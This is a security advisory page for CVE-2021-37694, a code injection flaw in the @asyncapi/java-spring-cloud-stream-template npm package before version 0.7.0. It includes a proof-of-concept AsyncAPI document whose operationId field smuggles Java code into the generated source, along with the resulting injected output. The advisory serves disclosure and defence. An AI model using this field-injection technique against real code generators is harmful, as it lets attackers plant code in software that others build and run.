GHSA-XJ6R-2JPM-QVXP

Vulnerability from github – Published: 2021-08-25 14:45 – Updated: 2021-08-24 18:50
VLAI?
Summary
Code injection issue for java-spring-cloud-stream-template
Details

The following was initially reported by @jonaslagoni:

Given the following command: ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output

With the following AsyncAPI document:

{
  "asyncapi": "2.0.0",
  "info": {
    "title": "Streetlight",
    "version": "1.0.0"
  },
  "defaultContentType": "json",
  "channels": {
    "security/audit/channel": {
      "description": "Channel for the turn on command which should turn on the streetlight",
      "parameters": {
        "streetlight_id": {
          "description": "The ID of the streetlight",
          "schema": {
            "type": "string"
          }
        }
      },
      "publish": {
        "operationId": "test() { System.out.println(\"injected\"); return test(0); }\n public Consumer<CustomClass> someothername",
        "message": {
          "name": "TurnonCommand",
          "payload": {
            "$ref": "#/components/schemas/CustomClass"
          }
        }
      }
    }
  },
  "components": {
    "schemas" : {
      "CustomClass": {
        "type": "object",
        "properties": {
          "prop": { 
              "type": "string"
          }
        }
      }
    }
  }
}

Which changes the following output: 

...
  @Bean
  public Consumer<CustomClass> test() {
    // Add business logic here.
    return null;
  }
...

To

...
  @Bean
  public Consumer<CustomClass> test() { System.out.println("injected"); return someothername(); }
  public Consumer<CustomClass> someothername() {
    // Add business logic here.
    return null;
  }
...
Severity ?
8.7 (High)
CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N
Show details on source website
To clipboard Create KEV Entry 

{
  "affected": [
    {
      "database_specific": {
        "last_known_affected_version_range": "\u003c= 0.6.9"
      },
      "package": {
        "ecosystem": "npm",
        "name": "@asyncapi/java-spring-cloud-stream-template"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "0.7.0"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2021-37694"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-94"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2021-08-24T18:50:59Z",
    "nvd_published_at": "2021-08-11T18:15:00Z",
    "severity": "HIGH"
  },
  "details": "The following was initially reported by @jonaslagoni:\n\nGiven the following command:\n`ag ./dummy.json @asyncapi/java-spring-cloud-stream-template --force-write --output ./output`\n\nWith the following AsyncAPI document:\n```json\n{\n  \"asyncapi\": \"2.0.0\",\n  \"info\": {\n    \"title\": \"Streetlight\",\n    \"version\": \"1.0.0\"\n  },\n  \"defaultContentType\": \"json\",\n  \"channels\": {\n    \"security/audit/channel\": {\n      \"description\": \"Channel for the turn on command which should turn on the streetlight\",\n      \"parameters\": {\n        \"streetlight_id\": {\n          \"description\": \"The ID of the streetlight\",\n          \"schema\": {\n            \"type\": \"string\"\n          }\n        }\n      },\n      \"publish\": {\n        \"operationId\": \"test() { System.out.println(\\\"injected\\\"); return test(0); }\\n public Consumer\u003cCustomClass\u003e someothername\",\n        \"message\": {\n          \"name\": \"TurnonCommand\",\n          \"payload\": {\n            \"$ref\": \"#/components/schemas/CustomClass\"\n          }\n        }\n      }\n    }\n  },\n  \"components\": {\n    \"schemas\" : {\n      \"CustomClass\": {\n        \"type\": \"object\",\n        \"properties\": {\n          \"prop\": { \n              \"type\": \"string\"\n          }\n        }\n      }\n    }\n  }\n}\n```\n\nWhich changes the following output: \n\n```java\n...\n  @Bean\n  public Consumer\u003cCustomClass\u003e test() {\n    // Add business logic here.\n    return null;\n  }\n...\n```\nTo\n```java\n...\n  @Bean\n  public Consumer\u003cCustomClass\u003e test() { System.out.println(\"injected\"); return someothername(); }\n  public Consumer\u003cCustomClass\u003e someothername() {\n    // Add business logic here.\n    return null;\n  }\n...\n```",
  "id": "GHSA-xj6r-2jpm-qvxp",
  "modified": "2021-08-24T18:50:59Z",
  "published": "2021-08-25T14:45:52Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/asyncapi/java-spring-cloud-stream-template/security/advisories/GHSA-xj6r-2jpm-qvxp"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-37694"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/asyncapi/java-spring-cloud-stream-template"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Code injection issue for java-spring-cloud-stream-template"
}


Log in or create an account to share your comment.




Tags
Taxonomy of the tags.




Sightings

Author Source Type Date

Nomenclature

  • Seen: The vulnerability was mentioned, discussed, or observed by the user.
  • Confirmed: The vulnerability has been validated from an analyst's perspective.
  • Published Proof of Concept: A public proof of concept is available for this vulnerability.
  • Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
  • Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
  • Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
  • Not confirmed: The user expressed doubt about the validity of the vulnerability.
  • Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.



Detection rules are retrieved from Rulezet.